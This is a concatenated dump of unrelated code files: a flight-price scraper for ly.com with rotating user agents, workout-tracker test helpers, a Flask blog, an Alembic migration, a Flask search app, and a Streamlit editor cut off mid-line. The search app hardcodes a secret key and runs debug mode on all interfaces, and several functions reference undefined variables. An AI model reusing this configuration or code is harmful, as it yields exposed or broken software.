f\"https://m.ly.com/kylintouch/sbook1_5?fromcitycode={from_city_code}&tocitycode={to_city_code}&childticket=0,0&fromairport{_from_city_code}=&toairport{_to_city_code}=&cabin=0&hasAirPort=3&RefId=10758821&bd_vid=\"\r\n # company_no = re.findall(\"^(.*?)\\d+\", str(plane_no), re.I)[0]\r\n company_no = str(plane_no)[0:2]\r\n plane_type = flight['amn']\r\n if self.has_node(flight, 'sc'):\r\n flight_transfer = flight['sc']\r\n flight_type = \"经停\"\r\n elif self.has_node(flight, \"ps\"):\r\n try:\r\n flight_transfer = flight['ps']['g5']['g5sc']\r\n except:\r\n flight_transfer = \"\"\r\n traceback.print_exc()\r\n flight_type = \"联程\"\r\n else:\r\n flight_transfer = \"\"\r\n flight_type = \"直飞\"\r\n metadata = {\r\n \"flight_transfer\": flight_transfer,\r\n \"flight_type\": flight_type,\r\n \"off_date\": flight_time,\r\n \"from_city\": _from_city,\r\n \"from_city_code\": _from_city_code,\r\n \"to_city\": _to_city,\r\n \"to_city_code\": _to_city_code,\r\n \"plane_no\": plane_no,\r\n \"company\": company,\r\n \"company_no\": company_no,\r\n \"platform\": platform,\r\n \"start_time\": start_time,\r\n \"end_time\": end_time,\r\n \"create_time\": create_time,\r\n \"plane_type\": plane_type,\r\n \"from_city_airport\": from_city_airport,\r\n \"to_city_airport\": to_city_airport,\r\n \"count\": count,\r\n }\r\n __data = self.parse_lowest_price(metadata)\r\n data_list.append(__data)\r\n # 产品价格与非产品价格一起返回,批量插入\r\n print(f\"爬取数据 -> 起飞时间: {flight_time} OD:{from_city}:{from_city_code}={to_city}:{to_city_code}航班数>>>{len(data_list)}\")\r\n names = ['company', 'company_no', 'plane_no', 'start_time', 'end_time', 'from_city', 'from_city_code', 'to_city', 'to_city_code', 'create_time', 'discount', 'off_date', 'platform', 'price', 'flight_type', 'plane_type', 'flight_transfer', 'from_city_airport', 'to_city_airport', 'task_time', 'server_ip', 'flight_number', 'lep_price', 'is_meal', 'baggage']\r\n # 将csv文件放入logs目录下\r\n csv_file = os.path.join(self.ylLog.second_path, fr\"{_from_city_code}-{_to_city_code}-{flight_time}-{ip_map[int(self.redisUtil.db)]}.csv\")\r\n print(\"***csv_file_name***\", csv_file)\r\n with open(csv_file, \"w+\", encoding=\"utf-8\", newline='') as f:\r\n f_csv = csv.writer(f)\r\n f_csv.writerow(names)\r\n f_csv.writerows(data_list)\r\n self.end_time = time.time()\r\n self.ylLog.info(f\"爬取耗时{self.end_time - self.start_time}\")\r\n msg = f\"起飞时间: {flight_time} OD:{from_city}:{from_city_code}={to_city}:{to_city_code}航班数>>>{count}\"\r\n self.ylLog.info(msg)\r\n item = YlBatchItem(\r\n from_city_code=_from_city_code,\r\n to_city_code=_to_city_code,\r\n off_date=flight_time,\r\n server_ip=ip_map[int(self.redisUtil.db)],\r\n csv_file_name=csv_file,\r\n flight_number=len(data_list),\r\n )\r\n yield item\r\n else:\r\n self.ylLog.info(f\"OD:{from_city}:{from_city_code}={to_city}:{to_city_code}航班数0\")\r\n pass\r\n except Exception as e:\r\n traceback.print_exc()\r\n path = \"/result/error_ua.txt\"\r\n self.ylFile.createFile(path, userAgent + '\\n')\r\n xmlpath = fr\"/result/{from_city}({from_city_code})-{to_city}({to_city_code})-{flight_time}-exception.html\"\r\n self.ylFile.createFile(xmlpath, response.body.decode(), model='w+')\r\n self.ylLog.info(f\"{xmlpath}写入源码文件成功\")\r\n pass\r\n else:\r\n self.fail += 1\r\n msg = f\"状态码异常>>>{self.fail}, 状态码: {response.status}\\n\"\r\n self.ylLog.exception(msg)\r\n path = fr\"/errorHtml/{from_city}-{to_city}-{flight_time}-status_error.html\"\r\n self.ylFile.createFile(path, response.body.decode())\r\n\r\n\r\n\r\n '''\r\n @Description: 
是产品价格的一个航班就请求详情链接,从经济舱的所有价格中找出非产品价格的并找到最低价格放入管道\r\n '''\r\n\r\n def parse_lowest_price(self, meta_data: dict) -> list:\r\n global gnjpapp_head, server_session_id, link_tracker_id, lep_price\r\n gnjpapp_head, server_session_id, link_tracker_id, lep_price = None, \"\", \"\", None\r\n self.ylLog.info(\"***解析产品价格航班***\")\r\n from_city = meta_data['from_city']\r\n from_city_code = meta_data['from_city_code']\r\n to_city = meta_data['to_city']\r\n to_city_code = meta_data['to_city_code']\r\n off_date = meta_data['off_date']\r\n create_time = meta_data['create_time']\r\n plane_no = meta_data['plane_no']\r\n plane_type = meta_data['plane_type']\r\n start_time = meta_data['start_time']\r\n end_time = meta_data['end_time']\r\n flight_transfer = meta_data['flight_transfer']\r\n flight_type = meta_data['flight_type']\r\n company = meta_data['company']\r\n company_no = meta_data['company_no']\r\n platform = meta_data['platform']\r\n from_city_airport = meta_data['from_city_airport']\r\n to_city_airport = meta_data['to_city_airport']\r\n count = int(meta_data['count'])\r\n __from_city_code = self.airport_map[\r\n from_city_code] if from_city_code in self.air_list else from_city_code\r\n __to_city_code = self.airport_map[\r\n to_city_code] if to_city_code in self.air_list else to_city_code\r\n\r\n # redis中是否已保存cookie\r\n if self.redisUtil.hash_exist_key(f\"ly:{self.now_date}-cookie\", \"cookies\"):\r\n cookies = str(self.redisUtil.get(f\"ly:{self.now_date}-cookie\", \"cookies\"),\r\n \"utf-8\")\r\n server_session_id, link_tracker_id, gnjpapp_head = self.get_cookie_params(cookies)\r\n ua = random.choice(user_agent_mobile)\r\n form_data = {\r\n \"AirCode\": plane_no[0:2],\r\n \"Arrival\": __to_city_code,\r\n \"ArrivalName\": get_airport(to_city_code, self.base_path).encode(\r\n \"utf-8\").decode(\r\n \"latin1\"),\r\n \"Departure\": __from_city_code,\r\n \"DepartureDate\": off_date + \" \" + start_time,\r\n \"DepartureName\": get_airport(from_city_code,\r\n self.base_path).encode(\r\n \"utf-8\").decode(\r\n \"latin1\"),\r\n \"GetType\": \"0\",\r\n \"IsBaby\": 0,\r\n \"IsBook15\": 1,\r\n \"IsFromPhoenix\": 1,\r\n \"IsMuilteSite\": 1,\r\n \"ProductType\": \"1\",\r\n \"QueryType\": \"1\",\r\n \"SessionId\": session_id,\r\n \"TripType\": \"0\",\r\n \"flightno\": plane_no,\r\n \"linkTrackerId\": link_tracker_id,\r\n \"newCabinDeal\": 2,\r\n \"openid\": \"\",\r\n \"plat\": int(gnjpapphead['tcplat']),\r\n \"refid\": \"0\",\r\n \"unionid\": \"\"\r\n }\r\n headers = self.get_headers_2(gnjpapphead, ua, link_tracker_id, session_id, cookies)\r\n headers['Referer'] = f'https://m.ly.com/touchbook/touch/sbook1_5?fromcitycode={from_city_code}&tocitycode={to_city_code}&childticket=0,0&fromairport={__from_city_code}&toairport=&cabin=0&hasAirPort=3&RefId=0&bd_vid='\r\n req_url = \"https://m.ly.com/touchbook/flightApis/wx/flightbffquery/query/getkylinflightlist\"\r\n try:\r\n with httpx.Client(headers=headers) as client:\r\n res = client.post(url=req_url, json=form_data, timeout=30, follow_redirects=False)\r\n if res.status_code in [200, 201]:\r\n self.success_lowest += 1\r\n self.ylLog.info(f\"成功返回JSON数据>>>{self.success_lowest}\")\r\n data = json.loads(res.content.decode())\r\n # 只取最低价格,所以只从经济舱里面取\r\n economy_list = data['body']['newCabinList']['economyList']\r\n sell_price, discount, price = [], [], []\r\n price_dict = defaultdict()\r\n for i, economy_cabin in enumerate(economy_list):\r\n # 首先判断是不是产品,不是产品才进行比较出最低价\r\n if str(economy_cabin['ruleId']).__eq__(\"00000\"):\r\n # 将最低价取出进行比较\r\n 
sell_price.append(int(economy_cabin['clientTicketPrice']))\r\n price_dict[int(economy_cabin['clientTicketPrice'])] = i\r\n # 没有ruleId为00000的价格,筛选出限时特惠,成人特惠,婴儿不可预订的价格\r\n elif len(economy_cabin['limitLabel']) == 0 or (\r\n economy_cabin['limitLabel'][0]['name'] == \"限时特惠\" or\r\n economy_cabin['limitLabel'][0]['name'] == \"婴儿不可预订\"\r\n ):\r\n sell_price.append(int(economy_cabin['clientTicketPrice']))\r\n price_dict[int(economy_cabin['clientTicketPrice'])] = i\r\n else:\r\n continue\r\n # 非空判断\r\n if len(sell_price) == 0:\r\n raise ValueError(\"No price!\")\r\n else:\r\n # 升序排序, 排在第一个的为最低价\r\n sell_price.sort(reverse=False)\r\n index = price_dict[sell_price[0]]\r\n price.append(str(sell_price[0]))\r\n discount.append(economy_list[index]['roomDes'])\r\n # 退改价格\r\n try:\r\n lep_price = economy_list[index]['lep']\r\n # lep为空字符串, 取lrp\r\n if lep_price == \"\":\r\n lep_price = economy_list[index]['lrp']\r\n except:\r\n print(\"err_from_city_code\", from_city_code, \"err_to_city_code\", to_city_code, \"err_off_date\", off_date, \"err_plane_no\", plane_no, \"err_economy_cabin\", economy_list[index])\r\n print(traceback.format_exc())\r\n lep_price = int(lep_price) if lep_price is not None and lep_price != \"\" else None\r\n # lep_price = \"提前改期免费\" if lep_price == 0 else f\"退改¥{str(lep_price)}起\"\r\n # 餐食情况\r\n is_meal = str(economy_list[index]['ml'])\r\n # 托运行李额\r\n baggage = int(economy_list[index]['baggage'])\r\n # baggage = \"无免费托运行李额\" if baggage == 0 else f\"托运行李额{str(baggage)}kg\"\r\n print(\"from_city_code\", from_city_code, \"from_city\", from_city, \"to_city_code\",\r\n to_city_code,\r\n \"to_city\", to_city, \"off_date\", off_date,\r\n \"plane_no\", plane_no, \"price\", price, \"discount\", discount, \"lep_price\", lep_price,\r\n \"is_meal\", is_meal, \"baggage\", baggage, \"from_city_airport\", from_city_airport, \"to_city_airport\", to_city_airport, \"create_time\", create_time)\r\n return [company, company_no, plane_no, start_time, end_time, from_city, from_city_code, to_city, to_city_code, create_time, str(discount[0]), off_date, platform, str(price), flight_type, plane_type, flight_transfer, from_city_airport, to_city_airport, self.task_time, ip_map[int(self.redisUtil.db)], count, lep_price, is_meal, baggage]\r\n else:\r\n self.fail += 1\r\n msg = f\"状态码异常>>>{self.fail}, 状态码: {res.status_code}\\n\"\r\n self.ylLog.exception(msg)\r\n path = fr\"/errorHtml/{from_city}-{to_city}-{off_date}-status_error.html\"\r\n self.ylFile.createFile(path, res.content.decode())\r\n except:\r\n traceback.print_exc()\r\n path = \"/result/error_ua.txt\"\r\n self.ylFile.createFile(path, '\\n')\r\n # -------------------d\r\n xmlpath = fr\"/result/{from_city}({from_city_code})-{to_city}({to_city_code})-{off_date}-exception.html\"\r\n self.ylFile.createFile(xmlpath, res.content.decode(), model='w+')\r\n self.ylLog.info(f\"{xmlpath}写入源码文件成功\")\r\n return []\r\n\r\n","repo_name":"Cjingger/__spider","sub_path":"spiders/ylSpider06.py","file_name":"ylSpider06.py","file_ext":"py","file_size_in_byte":31566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12158513559","text":"from __future__ import annotations\n\nimport random\nimport string\nfrom decimal import Decimal\n\nfrom src import model\nfrom src.adapters import repository\n\n\ndef random_lower_string() -> str:\n return \"\".join(random.choices(string.ascii_lowercase, k=32))\n\n\ndef add_workout_plan_to_db(\n plans_repository: repository.WorkoutRepository[model.WorkoutPlan],\n user_email: str,\n) 
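The lowest-fare selection above keeps a parallel price list plus a price-to-index dict, sorts, and then maps back. A single `min` over `(price, index)` pairs expresses the same choice with less state; a hedged sketch of that selection logic (field names and the Chinese label values come from the record):

```python
def cheapest_cabin(economy_list):
    """Pick the lowest-priced bookable economy cabin (sketch of the logic above)."""
    candidates = [
        (int(c["clientTicketPrice"]), i)
        for i, c in enumerate(economy_list)
        if c["ruleId"] == "00000"
        or not c["limitLabel"]
        or c["limitLabel"][0]["name"] in ("限时特惠", "婴儿不可预订")
    ]
    if not candidates:
        raise ValueError("No price!")
    price, index = min(candidates)   # lowest fare wins; ties fall to the lowest index
    return price, economy_list[index]
```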
-> model.WorkoutPlan:\n \"\"\"Add a random workout plan to the database.\"\"\"\n workout_plan_create = model.WorkoutPlanCreate(\n name=random_lower_string(),\n exercises=[\n model.ExercisePlan(name=random_lower_string(), sets=random.randint(1, 10))\n for _ in range(random.randint(1, 10))\n ],\n )\n return plans_repository.create(model=workout_plan_create, owner=user_email)\n\n\ndef add_workout_log_to_db(\n logs_repository: repository.WorkoutRepository[model.WorkoutLog],\n user_email: str,\n) -> model.WorkoutLog:\n \"\"\"Add a random workout log to the database.\"\"\"\n workout_log_create = model.WorkoutLogCreate(\n name=random_lower_string(),\n plans=[\n model.ExercisePlan(\n name=random_lower_string(),\n sets=random.randint(1, 10),\n )\n for _ in range(random.randint(1, 10))\n ],\n logs=[\n model.ExerciseLog(\n name=random_lower_string(),\n sets=[\n model.SetLog(\n weight=Decimal(random.randint(1, 100)),\n reps=random.randint(1, 100),\n )\n for _ in range(random.randint(1, 10))\n ],\n )\n for _ in range(random.randint(1, 10))\n ],\n )\n return logs_repository.create(model=workout_log_create, owner=user_email)\n","repo_name":"moyes-joe/workout-tracker-backend","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2768955468","text":"from __future__ import unicode_literals\nfrom flask import Flask,render_template,redirect,request\n\n# 创建应用程序对象\napp = Flask(__name__)\n\nclass Blog:\n def __init__(self, id, title, text):\n self.id = id\n self.title = title\n self.text = text\n\n\nblogs = []\nb1 = Blog(1,'hello1','zhangsan')\nb2 = Blog(2,'hello2','lisi')\nblogs.append(b1)\nblogs.append(b2)\n\n\n@app.route('/')\ndef index():\n # 渲染首页HTML模板文件\n return render_template('index.html')\n\n@app.route('/blogs')\ndef list_notes():\n\n\n # 渲染博文列表页面目标文件,传入blogs参数\n return render_template('list_blogs.html',blogs = blogs)\n\n@app.route('/blog/<id>')\ndef query_note(id):\n\n blog = None\n # 到数据库查询博文详情\n for blg in blogs:\n if blg.id == int(id):\n blog = blg\n\n # 渲染博文详情页面\n return render_template('query_blog.html',blog = blog)\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1',port=9999)","repo_name":"luckyxx/micro_server","sub_path":"blog/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42302080518","text":"\"\"\"added mechanic id in repair model\n\nRevision ID: 14a1b97b8f0f\nRevises: 8ed3cc33c444\nCreate Date: 2022-08-21 22:24:13.316194\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '14a1b97b8f0f'\ndown_revision = '8ed3cc33c444'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('repair', sa.Column('mechanic_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'repair', 'mechanic', ['mechanic_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
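The `/blog/<id>` rule in the Flask record above (restored here; the angle-bracket converter had been stripped by extraction) receives the path segment as a string and casts it with `int(id)` in the loop. Flask's `int` converter does both the cast and the validation; a hedged variant (the `blog_id` parameter name and `query_note_typed` function name are illustrative, not from the record):

```python
@app.route('/blog/<int:blog_id>')
def query_note_typed(blog_id):
    # The int converter 404s non-numeric paths and hands the view an int,
    # so the manual int(id) cast in the record becomes unnecessary.
    blog = next((b for b in blogs if b.id == blog_id), None)
    return render_template('query_blog.html', blog=blog)
```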
###\n op.drop_constraint(None, 'repair', type_='foreignkey')\n op.drop_column('repair', 'mechanic_id')\n # ### end Alembic commands ###\n","repo_name":"PeterM358/VehicleRepairBook","sub_path":"migrations/versions/14a1b97b8f0f_added_mechanic_id_in_repair_model.py","file_name":"14a1b97b8f0f_added_mechanic_id_in_repair_model.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70507826729","text":"import os\nfrom json import JSONEncoder\n\n# pip install httpagentparser\nimport httpagentparser # for getting the user agent as json\nfrom user_agents import parse\nimport nltk\nfrom flask import Flask, render_template, session\nfrom flask import request\nimport datetime\nimport time\nimport random\n\nfrom myapp.analytics.analytics_data import AnalyticsData, ClickedDoc\nfrom myapp.search.load_corpus import load_corpus, to_df\nfrom myapp.search.objects import Document, StatsDocument, StatsQuery, StatsSession, ResultItem\nfrom myapp.search.search_engine import SearchEngine\n\n# *** for using method to_json in objects ***\ndef _default(self, obj):\n return getattr(obj.__class__, \"to_json\", _default.default)(obj)\n\n_default.default = JSONEncoder().default\nJSONEncoder.default = _default\n\n# end lines ***for using method to_json in objects ***\n\n# instantiate the Flask application\napp = Flask(__name__)\n\n# random 'secret_key' is used for persisting data in secure cookie\napp.secret_key = 'afgsreg86sr897b6st8b76va8er76fcs6g8d7'\n# open browser dev tool to see the cookies\napp.session_cookie_name = 'IRWA_SEARCH_ENGINE'\n\n# instantiate our search engine\nsearch_engine = SearchEngine()\n\n# instantiate our in memory persistence\nanalytics_data = AnalyticsData()\n\nfull_path = os.path.realpath(__file__)\npath, filename = os.path.split(full_path)\n\n# load documents corpus into memory.\nfile_path = path + \"/Rus_Ukr_war_data.json\"\ncorpus = load_corpus(file_path)\nprint(\"loaded corpus. 
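The migration's `downgrade` above drops the foreign key with `name=None`; Alembic passes that straight through, and unnamed constraints cannot be dropped reliably (autogenerated names vary by backend, and SQLite has no names at all). Naming the constraint in both directions is the usual fix; a hedged sketch (the constraint name is illustrative):

```python
FK_NAME = "fk_repair_mechanic_id"   # illustrative; any consistent name works

def upgrade():
    op.add_column('repair', sa.Column('mechanic_id', sa.Integer(), nullable=True))
    op.create_foreign_key(FK_NAME, 'repair', 'mechanic', ['mechanic_id'], ['id'])

def downgrade():
    op.drop_constraint(FK_NAME, 'repair', type_='foreignkey')
    op.drop_column('repair', 'mechanic_id')
```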
first elem:\", list(corpus.values())[0], \"\\n\")\n\nsession_id = 'Session' + str(random.randint(0, 100000))\n\n# creating the df\ndf = to_df(corpus)\ncolumn_values = df[\"Tweet_Text\"].tolist()\nt_lines = []\ni = 0\n\nresult_items = []\nfor index, row in df.iterrows():\n article_id = i\n tweet_id = row['Tweet_Id']\n tweet_text = row['Tweet_Text']\n tweet_text =\"\".join(tweet_text)\n \n result_item = ResultItem(id=row['Tweet_Id'], description=row['Tweet_Text'], date=row['Date'], \n url=row['Url'], title = row[\"Title\"])\n result_items.append(result_item)\n\n line = f\"{tweet_id}|{article_id}|{tweet_text}\"\n t_lines.append(line)\n i = i+1\n\n\n# Home URL \"/\"\n@app.route('/')\ndef index():\n session['end'] = time.time()\n \n print(\"starting home url /...\")\n\n # flask server creates a session by persisting a cookie in the user's browser.\n # the 'session' object keeps data between multiple requests\n session['some_var'] = \"IRWA 2023 home\"\n\n user_agent = request.headers.get('User-Agent')\n print(\"Raw user browser:\", user_agent)\n\n user_ip = request.remote_addr\n agent = httpagentparser.detect(user_agent)\n user_os = agent['os']['name']\n user_browser = agent['browser']['name']\n date_time = datetime.datetime.now()\n date = str(date_time.day) + '-' + str(date_time.month) + '-' + str(date_time.year)\n hour = str(date_time.hour)\n \n print(\"Remote IP: {} - JSON user browser {}\".format(user_ip, agent))\n print(session)\n\n # store data in statistics tables\n if user_browser in analytics_data.fact_browser.keys():\n analytics_data.fact_browser[user_browser] += 1\n else:\n analytics_data.fact_browser[user_browser] = 1\n \n if user_ip in analytics_data.fact_ip.keys():\n analytics_data.fact_ip[user_ip] += 1\n else:\n analytics_data.fact_ip[user_ip] = 1\n \n if user_os in analytics_data.fact_OS.keys():\n analytics_data.fact_OS[user_os] += 1\n else:\n analytics_data.fact_OS[user_os] = 1\n \n if date in analytics_data.fact_date.keys():\n analytics_data.fact_date[date] += 1\n else:\n analytics_data.fact_date[date] = 1\n \n if hour in analytics_data.fact_time.keys():\n analytics_data.fact_time[hour] += 1\n else:\n analytics_data.fact_time[hour] = 1\n \n try:\n dwell_time = session['end'] - session['start']\n if session['last_doc_id'] in analytics_data.fact_dwell_time.keys():\n analytics_data.fact_dwell_time[session['last_doc_id']] += dwell_time\n else:\n analytics_data.fact_dwell_time[session['last_doc_id']] = dwell_time\n except:\n pass\n\n return render_template('index.html', page_title=\"Welcome\")\n\n@app.route('/search', methods=['POST'])\ndef search_form_post():\n search_query = request.form['search-query']\n terms = search_query.split()\n\n # store data in statistics tables\n # table 1\n for term in terms:\n if term in analytics_data.fact_terms.keys():\n analytics_data.fact_terms[term] += 1\n else:\n analytics_data.fact_terms[term] = 1\n\n if search_query not in analytics_data.fact_number_terms.keys():\n analytics_data.fact_number_terms[search_query] = len(terms)\n \n if search_query in analytics_data.fact_query_times.keys():\n analytics_data.fact_query_times[search_query] += 1\n else:\n analytics_data.fact_query_times[search_query] = 1\n \n # stats for sessions\n if session_id in analytics_data.fact_num_queries.keys():\n analytics_data.fact_num_queries[session_id] += 1\n else:\n analytics_data.fact_num_queries[session_id] = 1\n \n session['last_search_query'] = search_query\n\n search_id = analytics_data.save_query_terms(search_query)\n\n ranked_docs, result_scores = 
search_engine.search(search_query, t_lines)\n\n found_count = len(ranked_docs)\n session['last_found_count'] = found_count\n\n print(session)\n\n docs = []\n\n for doc_id in ranked_docs:\n doc_id = int(doc_id)\n if doc_id in df['Tweet_Id'].values:\n row = df[df['Tweet_Id'] == doc_id].iloc[0]\n docs.append(ResultItem(row['Tweet_Id'], row[\"Title\"], row['Tweet_Text'], row['Date'], \"doc_details?id={}&search_id={}&search_query={}\".format(row['Tweet_Id'], search_id, search_query)))\n else:\n print(f\"Document with ID {doc_id} not found in the 'Tweet_Id' column.\")\n \n return render_template('results.html', results_list=docs, page_title=\"Results\", found_counter=found_count)\n\n\n@app.route('/doc_details', methods=['GET'])\ndef doc_details():\n session['start'] = time.time()\n # getting request parameters:\n #user = request.args.get('user')\n \n print(\"doc details session: \")\n print(session)\n\n res = session[\"some_var\"]\n\n print(\"recovered var from session:\", res)\n\n # get the query string parameters from request\n clicked_doc_id = int(request.args[\"id\"])\n session['last_doc_id'] = clicked_doc_id\n p1 = int(request.args[\"search_id\"]) # transform to Integer\n query = request.args[\"search_query\"]\n print(\"click in id={}\".format(clicked_doc_id))\n\n # store data in statistics tables\n # table 2\n if clicked_doc_id in analytics_data.fact_clicks.keys():\n analytics_data.fact_clicks[clicked_doc_id] += 1\n if query not in analytics_data.fact_queries[clicked_doc_id]:\n analytics_data.fact_queries[clicked_doc_id].append(query)\n else:\n analytics_data.fact_clicks[clicked_doc_id] = 1\n analytics_data.fact_queries[clicked_doc_id] = [query]\n \n if len(analytics_data.fact_rankings) < 10:\n analytics_data.fact_rankings[clicked_doc_id] = analytics_data.fact_clicks[clicked_doc_id]\n else:\n if analytics_data.fact_rankings[clicked_doc_id] > min(analytics_data.fact_rankings.values()):\n minimum = min(analytics_data.fact_rankings.values())\n docs = [docs for doc in analytics_data.fact_rankings.keys() if analytics_data.fact_rankings[doc]==minimum]\n analytics_data.fact_rankings.pop(docs[0])\n analytics_data.fact_rankings[clicked_doc_id] = analytics_data.fact_clicks[clicked_doc_id]\n else:\n analytics_data.fact_rankings[clicked_doc_id] = analytics_data.fact_clicks[clicked_doc_id]\n\n if session_id in analytics_data.fact_num_detail.keys():\n analytics_data.fact_num_detail[session_id] += 1\n else:\n analytics_data.fact_num_detail[session_id] = 1\n \n print(\"fact_clicks count for id={} is {}\".format(clicked_doc_id, analytics_data.fact_clicks[clicked_doc_id]))\n return render_template('doc_details.html', item=corpus[clicked_doc_id])\n\n\n@app.route('/stats', methods=['GET'])\ndef stats():\n\n docs = []\n queries = []\n\n for doc_id in analytics_data.fact_clicks:\n row: Document = corpus[int(doc_id)]\n count = analytics_data.fact_clicks[doc_id]\n\n if doc_id in analytics_data.fact_rankings.keys():\n is_top10=True\n else: \n is_top10=False\n\n queries_related = analytics_data.fact_queries[doc_id]\n\n try: \n dwell_time = round(analytics_data.fact_dwell_time[doc_id], 2) \n except: \n dwell_time=1\n\n doc = StatsDocument(row.id, row.title, row.description, row.doc_date, row.url, count, is_top10, queries_related, dwell_time)\n docs.append(doc)\n \n for query in analytics_data.fact_query_times:\n length = analytics_data.fact_number_terms[query]\n times_searched = analytics_data.fact_query_times[query]\n query = StatsQuery(query, length, times_searched)\n queries.append(query)\n\n 
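The results loop above runs `df[df['Tweet_Id'] == doc_id]` once per ranked document, which scans the whole column each time. Indexing the frame by `Tweet_Id` once makes every lookup a direct index hit; a hedged sketch, assuming `Tweet_Id` values are unique in the corpus:

```python
# Build once, next to the other module-level frames:
df_by_id = df.set_index('Tweet_Id')

# Then inside search_form_post():
for doc_id in map(int, ranked_docs):
    if doc_id in df_by_id.index:
        row = df_by_id.loc[doc_id]     # O(1)-ish lookup instead of a column scan
        # row['Title'], row['Tweet_Text'], row['Date'] as before
    else:
        print(f"Document with ID {doc_id} not found.")
```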
print(analytics_data.fact_browser, analytics_data.fact_OS) \n session_data = StatsSession(analytics_data.fact_browser, analytics_data.fact_OS, analytics_data.fact_ip, analytics_data.fact_time, analytics_data.fact_date, analytics_data.fact_num_queries, analytics_data.fact_num_detail)\n \n # simulate sort by ranking\n docs.sort(key=lambda doc: doc.count, reverse=True)\n return render_template('stats.html', clicks_data=docs, searched_queries=queries, session_data=session_data)\n \n\n@app.route('/dashboard', methods=['GET'])\ndef dashboard():\n visited_docs = []\n print(analytics_data.fact_clicks.keys())\n\n for doc_id in analytics_data.fact_clicks.keys():\n d: Document = corpus[int(doc_id)]\n doc = ClickedDoc(doc_id, d.description, analytics_data.fact_clicks[doc_id])\n visited_docs.append(doc)\n\n # simulate sort by ranking\n visited_docs.sort(key=lambda doc: doc.counter, reverse=True)\n visited_ser = []\n\n for doc in visited_docs: \n visited_ser.append(doc.to_json())\n\n return render_template('dashboard.html', visited_docs=visited_ser)\n\n\n@app.route('/sentiment')\ndef sentiment_form():\n return render_template('sentiment.html')\n\n\n@app.route('/sentiment', methods=['POST'])\ndef sentiment_form_post():\n text = request.form['text']\n nltk.download('vader_lexicon')\n from nltk.sentiment.vader import SentimentIntensityAnalyzer\n sid = SentimentIntensityAnalyzer()\n score = ((sid.polarity_scores(str(text)))['compound'])\n return render_template('sentiment.html', score=score)\n\n\nif __name__ == \"__main__\":\n app.run(port=8088, host=\"0.0.0.0\", threaded=False, debug=True)\n","repo_name":"edithruizz/IRWA-Project","sub_path":"Part 4/web_app.py","file_name":"web_app.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74076593129","text":"# get code from script_default_agent.py\nfrom streamlit_ace import st_ace\nimport streamlit as st\nimport tempfile\n\nst.set_page_config(layout=\"wide\")\nfrom datab import Database_Scripts\n# get all the scripts from the database\n\ndb = Database_Scripts()\nscripts = db.select()\nscripts = [script[0] for script in scripts]\nif len(scripts) == 0:\n #\n st.info('No projects found. 
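`sentiment_form_post` above downloads the VADER lexicon and rebuilds the analyzer on every POST; both are idempotent but slow inside the request path. Moving them to import time keeps the handler cheap; a hedged sketch of the same route:

```python
# Once, at module import time (next to the other setup code):
nltk.download('vader_lexicon', quiet=True)
from nltk.sentiment.vader import SentimentIntensityAnalyzer
sid = SentimentIntensityAnalyzer()

@app.route('/sentiment', methods=['POST'])
def sentiment_form_post():
    text = request.form['text']
    score = sid.polarity_scores(str(text))['compound']  # reuse the analyzer
    return render_template('sentiment.html', score=score)
```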
Create a new project.')\n st.stop()\n \nproject_name = st.sidebar.selectbox('Select a project', scripts)\n\ndef get_code(path='scripts/script_default_agent.py'):\n python_script_path = path\n # read as string\n with open(python_script_path, 'r') as f:\n value = f.read()\n st.write(value)\n return str(value)\n\ndef get_code_from_db(project_name):\n try:\n # now get the code from the database\n db = Database_Scripts()\n scripts = db.get_from_project(project_name)\n scripts = scripts[0]\n return scripts\n except:\n st.stop()\n \nc1,c2,c3 = st.columns(3) \nradio = c1.radio('Select a script', ['Agent', 'Model', 'Utils'], horizontal=True)\n\n# Create a new project\nmy_form3 = st.sidebar.form(key='form3', clear_on_submit=True)\nx1,x2 = my_form3.columns(2)\nsubmit_button = x2.form_submit_button(label='Create new Project', use_container_width=True)\nproject_name_new = x1.text_input(label='Project Name', value='', autocomplete='on', key=None, help=None)\nunique_project_name = True if project_name_new not in scripts else False\nif submit_button and unique_project_name:\n default_agent = get_code('scripts/script_default_agent.py')\n default_model = get_code('scripts/script_default_model.py')\n default_utils = get_code('scripts/script_default_utils.py')\n\n db.insert(project_name_new, default_model, default_agent, default_utils)\n st.experimental_rerun()\n\n#\nsave = st.sidebar.button('Save', use_container_width=True)\nrestore_base = c3.button('Restore Default', use_container_width=True)\nagent_code = db.get_agent_from_project(project_name)[0][0]\nmodel_code = db.get_model_from_project(project_name)[0][0]\nutils_code = db.get_utils_from_project(project_name)[0][0]\n\nif radio == 'Agent':\n value = agent_code\nelif radio == 'Model':\n value = model_code\nelif radio == 'Utils':\n value = utils_code\n\ncode_area = st_ace(value=value, language='python', theme='monokai', keybinding='vscode', font_size=14, tab_size=4, show_gutter=True, show_print_margin=True, wrap=True, auto_update=True, readonly=False, key=None)\n\nif save and radio == 'Agent':\n db.update_agent_from_project(project_name=project_name, Agent=code_area)\n agent_code = db.get_agent_from_project(project_name)[0][0]\n \nelif save and radio == 'Model':\n db.update_model_from_project(project_name=project_name, Model=code_area)\n model_code = db.get_model_from_project(project_name)[0][0]\n # update the model from project\n\nelif save and radio == 'Utils':\n db.update_utils_from_project(project_name=project_name, Utils=code_area)\n utils_code = db.get_utils_from_project(project_name)[0][0]\n\nif restore_base:\n db.update_from_project(project_name=project_name, Model=get_code('scripts/script_default_model.py'), Agent=get_code('scripts/script_default_agent.py'), Utils=get_code('scripts/script_default_utils.py'))\n st.balloons()\n st.experimental_rerun()\n\ndelete_button = 